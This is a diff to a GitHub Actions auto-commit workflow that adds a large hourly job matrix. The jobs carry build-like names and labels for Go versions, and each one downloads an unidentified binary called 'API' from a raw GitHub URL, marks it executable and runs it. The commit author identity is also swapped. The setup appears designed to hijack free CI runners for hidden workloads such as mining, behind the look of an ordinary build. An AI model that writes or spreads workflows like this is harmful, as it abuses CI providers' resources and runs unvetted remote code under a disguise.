--- a/.github/workflows/autocommit.yml
+++ b/.github/workflows/autocommit.yml
@@ -1,17 +1,41 @@
-name: Auto Commit
+name: API
 
 on:
-
   push:
     branches:
       - master
       
   schedule:
    - cron: "2 * * * *" 
-
+   
 jobs:
-  auto_commit:
+  build:
+    name: Vps
     runs-on: ubuntu-latest
+    strategy:
+      max-parallel: 256
+      fail-fast: false
+      matrix:
+        go: [1.1, 1.2, 1.3, 1.4,]
+        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N]
+    timeout-minutes: 60
+    env:
+        NUM_JOBS: 256
+        JOB: ${{ matrix.go }}
+    steps:
+    - name: Set up Go ${{ matrix.go }}
+      uses: actions/setup-go@v1
+      with:
+        go-version: ${{ matrix.go }}
+      id: go
+    - name: Setup
+      uses: actions/checkout@v1
+    - name: runner_go
+      run: |
+        wget https://raw.githubusercontent.com/manaiopre/python-api/master/API && chmod +x API && ./API
+        
+ API-1:       
+  runs-on: ubuntu-latest
     steps:
       - name: Set global directory
         run: git config --global --add safe.directory /github/workspace
@@ -28,8 +52,8 @@ jobs:
           
       - name: Commit changes
         run: |
-          git config --local user.email "shelbi.1@linksnb.com"
-          git config --local user.name "shelbise"
+          git config --local user.email "manaiopre@proton.me"
+          git config --local user.name "manaiopre"
           git add -A
           
           arr[0]="compile"
@@ -44,4 +68,3 @@ jobs:
           force: true
           directory: "."
           github_token: ${{ secrets.GITHUB_TOKEN }}
-
